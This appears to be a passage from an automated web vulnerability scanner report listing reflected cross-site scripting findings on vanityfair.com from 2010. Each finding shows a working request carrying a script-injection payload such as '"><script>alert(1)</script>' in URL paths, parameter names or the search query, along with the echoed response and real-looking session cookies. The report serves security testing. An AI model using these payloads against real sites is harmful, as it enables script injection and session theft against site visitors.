The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bac78'%3babfe1f31b7c was submitted in the REST URL parameter 5. This input was echoed as bac78';abfe1f31b7c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/wolcott/2010/11/trust-but-verify-a-talking.htmlbac78'%3babfe1f31b7c HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:35 GMT Date: Mon, 29 Nov 2010 16:50:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77411
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.htmlbac78';abfe1f31b7c', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 821dd-->a719fc09d75 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/wolcott/2010/11/trust-but-verify-a-talking.html821dd-->a719fc09d75 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:37 GMT Date: Mon, 29 Nov 2010 16:50:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.255. http://www.vanityfair.com/politics/features/2004/01/plame200401 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/politics/features/2004/01/plame200401
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6ef"><script>alert(1)</script>9b3f5ed15df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /politics/features/2004/01/plame200401?af6ef"><script>alert(1)</script>9b3f5ed15df=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=299 Expires: Mon, 29 Nov 2010 16:54:52 GMT Date: Mon, 29 Nov 2010 16:49:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 104937
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/politics/features/2004/01/plame200401?printable=true&af6ef"><script>alert(1)</script>9b3f5ed15df=1" title="Print this page"> ...[SNIP]...
1.256. http://www.vanityfair.com/politics/features/2010/10/sarah-palin-201010 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/politics/features/2010/10/sarah-palin-201010
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94b3d"><script>alert(1)</script>7d5f42a8be3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /politics/features/2010/10/sarah-palin-201010?94b3d"><script>alert(1)</script>7d5f42a8be3=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:50 GMT Date: Mon, 29 Nov 2010 16:49:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 108421
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/politics/features/2010/10/sarah-palin-201010?printable=true&94b3d"><script>alert(1)</script>7d5f42a8be3=1" title="Print this page"> ...[SNIP]...
1.257. http://www.vanityfair.com/politics/features/2010/11/election-night-slide-show-201011 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8fe1"><script>alert(1)</script>28071ff5b97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /politics/features/2010/11/election-night-slide-show-201011?e8fe1"><script>alert(1)</script>28071ff5b97=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:53 GMT Date: Mon, 29 Nov 2010 16:49:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 105835
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/politics/features/2010/11/election-night-slide-show-201011?printable=true&e8fe1"><script>alert(1)</script>28071ff5b97=1" title="Print this page"> ...[SNIP]...
1.258. http://www.vanityfair.com/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e465"><script>alert(1)</script>bd4d9d25178 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?5e465"><script>alert(1)</script>bd4d9d25178=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:37:19 GMT Date: Mon, 29 Nov 2010 16:32:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 128498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/search?printable=true&5e465"><script>alert(1)</script>bd4d9d25178=1" title="Print this page"> ...[SNIP]...
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload bd08c<script>alert(1)</script>50d29e7cef0 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?query=(+keywords%3a%22Web+Exclusives%22+)+AND+(+section%3a(%22hollywood%22+OR+%22business%22+OR+%22politics%22+OR+%22culture%22+OR+%22society%22+OR+%22style%22+OR+%22blogs%22+OR+%22Video%22)+)+AND+(+type%3a(%22article_v2%22+OR+%22index_v2%22+OR+%22list%22+OR+%22video_v2%22+)+)bd08c<script>alert(1)</script>50d29e7cef0& HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:53:02 GMT Date: Mon, 29 Nov 2010 16:48:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 81789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... Web Exclusives" ) AND ( section:("hollywood" OR "business" OR "politics" OR "culture" OR "society" OR "style" OR "blogs" OR "Video") ) AND ( type:("article_v2" OR "index_v2" OR "list" OR "video_v2" ) )bd08c<script>alert(1)</script>50d29e7cef0</h2> ...[SNIP]...
The value of the query request parameter is copied into the HTML document as text between TITLE tags. The payload a0ae3</title><script>alert(1)</script>20e1459f959 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?query=a0ae3</title><script>alert(1)</script>20e1459f959& HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=299 Expires: Mon, 29 Nov 2010 16:53:04 GMT Date: Mon, 29 Nov 2010 16:48:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80046
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.261. http://www.vanityfair.com/services/privacypolicy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/services/privacypolicy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7dd3"><script>alert(1)</script>c58bfc76fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/privacypolicy?e7dd3"><script>alert(1)</script>c58bfc76fab=1 HTTP/1.1 Host: www.vanityfair.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the printable request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f466d"><script>alert(1)</script>d9307ac5c56 was submitted in the printable parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/privacypolicy?printable=truef466d"><script>alert(1)</script>d9307ac5c56 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Expires: Mon, 29 Nov 2010 16:47:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 29 Nov 2010 16:47:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61390
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/services/privacypolicy?printable=true&printable=truef466d"><script>alert(1)</script>d9307ac5c56" title="Print this page"> ...[SNIP]...
1.263. http://www.vanityfair.com/services/rss/summary [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/services/rss/summary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 520a1"><script>alert(1)</script>d5a49097412 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/rss/summary?520a1"><script>alert(1)</script>d5a49097412=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:57:13 GMT Date: Mon, 29 Nov 2010 16:47:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 90008
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/services/rss/summary?printable=true&520a1"><script>alert(1)</script>d5a49097412=1" title="Print this page"> ...[SNIP]...
1.264. http://www.vanityfair.com/services/useragreement [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/services/useragreement
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8757"><script>alert(1)</script>998cc1d5678 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/useragreement?f8757"><script>alert(1)</script>998cc1d5678=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Expires: Mon, 29 Nov 2010 16:47:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 29 Nov 2010 16:47:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 110003
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/services/useragreement?printable=true&f8757"><script>alert(1)</script>998cc1d5678=1" title="Print this page"> ...[SNIP]...
1.265. http://www.vanityfair.com/society/features/2010/12/prince-william-and-kate-slide-show-201012 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d966f"><script>alert(1)</script>0a289386dca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /society/features/2010/12/prince-william-and-kate-slide-show-201012?d966f"><script>alert(1)</script>0a289386dca=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:32 GMT Date: Mon, 29 Nov 2010 16:49:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/society/features/2010/12/prince-william-and-kate-slide-show-201012?printable=true&d966f"><script>alert(1)</script>0a289386dca=1" title="Print this page"> ...[SNIP]...
1.266. http://www.vanityfair.com/society/features/2010/12/william-and-kate-201012 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/society/features/2010/12/william-and-kate-201012
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e887"><script>alert(1)</script>2f4ac976e7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
